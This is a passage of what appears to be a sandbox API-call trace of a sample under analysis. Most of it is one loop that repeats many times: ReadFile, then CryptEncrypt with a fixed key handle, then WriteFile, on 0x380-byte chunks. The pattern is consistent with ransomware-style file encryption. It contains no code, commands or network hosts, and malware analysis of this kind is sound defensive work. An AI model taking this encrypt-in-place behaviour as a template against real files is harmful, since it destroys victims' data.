hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.089] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.090] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.090] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.091] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.091] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.092] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.092] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.093] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.093] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.094] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.095] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.096] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.097] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.097] 